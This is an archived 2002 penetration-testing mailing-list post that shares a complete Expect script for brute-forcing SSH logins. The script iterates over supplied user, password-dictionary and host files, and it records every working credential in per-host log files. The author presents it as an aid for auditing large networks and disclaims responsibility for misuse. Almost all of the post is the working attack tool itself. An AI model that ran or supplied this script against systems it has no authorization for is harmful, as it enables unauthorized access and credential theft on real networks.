Penetration Testing mailing list archives
SSh brute forcer
From: James Shanahan <jshanahan () comcastpc com>
Date: 25 Jan 2002 18:07:59 -0000
This is an expect script that will allow you to specify a host file, user file, and a dictionary. Extremely useful for auditing large networks where you can't manually log into every machine or don't fee like re-running something on every host. Hope everyone finds it useful. #!/usr/bin/expect -f # # Written by James Shanahan (jshanahan () comcastpc com) # and Erin Palmer(epalmer () comcastpc com) # ssh brute forcer # This will alow you to specify hosts, password lists, and a user # I do not take any reponsibilty for what you do with this tool # Hopefully it will make your life easier rather then making other # peoples lives more difficult! set timeout 5 set dictionary [lindex $argv 0] set file [lindex $argv 1] set user [lindex $argv 2] if {[llength $argv] != 3} { puts stderr "Usage: $argv0 <dictionary-file> <hosts- file> <user-file>\n" exit } set tryHost [open $file r] set tryPass [open $dictionary r] set tryUser [open $user r] set passwords [read $tryPass] set hosts [read $tryHost] set login [read $tryUser] foreach username $login { foreach passwd $passwords { foreach ip $hosts { spawn ssh $username@$ip expect ":" send "$passwd\n" set logFile [open $ip.log a] expect "L" { puts $logFile "password for $username@$ip is $passwd\n" close $logFile } set id [exp_pid] exec kill -INT $id } } } James G. Shanahan Jr. Security Engineer Comcast Corporation ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- SSh brute forcer James Shanahan (Jan 25)